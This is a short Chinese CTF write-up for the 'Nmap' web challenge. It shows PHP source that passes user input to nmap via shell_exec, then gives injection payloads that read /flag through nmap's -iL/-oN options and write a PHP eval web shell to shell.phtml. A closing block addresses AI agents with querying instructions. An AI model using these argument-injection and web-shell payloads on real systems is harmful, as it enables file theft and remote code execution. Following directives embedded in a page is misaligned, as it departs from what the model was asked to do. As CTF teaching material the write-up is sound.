# \[朱雀组]Nmap

康康源码：

index.php

```
<?
require('settings.php');


set_time_limit(0);
if (isset($_POST['host'])):
	if (!defined('WEB_SCANS')) {
        	die('Web scans disabled');
	}

	$host = $_POST['host'];
	if(stripos($host,'php')!==false){
		die("Hacker...");
	}
	$host = escapeshellarg($host);
	$host = escapeshellcmd($host);

	$filename = substr(md5(time() . rand(1, 10)), 0, 5);
	$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
	$result_scan = shell_exec($command);
	if (is_null($result_scan)) {
		die('Something went wrong');
	} else {
		header('Location: result.php?f=' . $filename);
	}
else:
?>
```

settings.php：

```
<?
# Path where all files stored
# Example values: /home/node/results/
# Or just: xml/
# Must be readble/writable for web server! so chmod 777 xml/
define('RESULTS_PATH', 'xml/');

# Nmap string arguments for web scanning
# Example: -sV -Pn
define('NMAP_ARGS', '-Pn -T4 -F --host-timeout 1000ms');

# Comment this line to disable web scans
define('WEB_SCANS', 'enable');

# URL of application
# for example: http://example.com/scanner/
# Or just: /scanner/
define('APP_URL', '/');

# Secret word to protect webface (reserved)
# Uncomment to set it!
# define('secret_word', 'passw0rd1337');

?>
```

主要语句：

```
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
```

带入之后相当于：

```
$ nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/$filename $host
```

**方法一：直接读flag写入文件**

* -iL:从文件中加载目标
* -oN:将扫描后的文件信息以“Normal”的形式输出存储

```
 ' -iL /flag -oN flag.txt '
```

访问flag.txt

**方法二：一句话木马绕过php过滤**

```
'<?=eval($_GET[oatmeal]);?> -oN shell.phtml '
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook-88.gitbook.io/ctf-writeup/2020/2020-wang-ding-bei/zhu-que-zu-nmap.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.